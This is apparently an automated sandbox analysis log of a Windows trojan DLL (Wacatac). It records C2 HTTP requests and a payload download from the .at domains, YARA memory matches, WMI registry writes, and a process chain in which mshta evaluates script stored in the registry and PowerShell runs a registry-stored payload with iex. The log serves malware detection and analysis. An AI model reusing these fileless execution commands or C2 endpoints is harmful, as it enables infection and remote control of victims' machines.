Source: global traffic |
HTTP traffic detected: GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: c56.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: {E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr |
String found in binary or memory: http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S |
Source: {E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr |
String found in binary or memory: http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn |
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp |
String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i |
Source: {E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr |
String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG |
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll |
String found in binary or memory: https://toldsend.com4 |
Source: Yara match |
File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll' |
|
Source: unknown |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace |
|
Source: unknown |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put |
|
Source: unknown |
Process created: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding |
|
Source: unknown |
Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
|
Source: unknown |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 |
|
Source: unknown |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 |
|
Source: unknown |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: unknown unknown |
Source: C:\Windows\System32\loaddll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAWX |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. |
Source: SpeechRuntime.exe, 00000015.00000003.407826903.00000255BD33C000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW0 |
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW |
Source: mshta.exe, 00000026.00000003.498767463.0000022639476000.00000004.00000001.sdmp |
Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/ |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. |
Source: SpeechRuntime.exe, 00000015.00000003.404478120.00000255BD348000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp |
Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service. |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |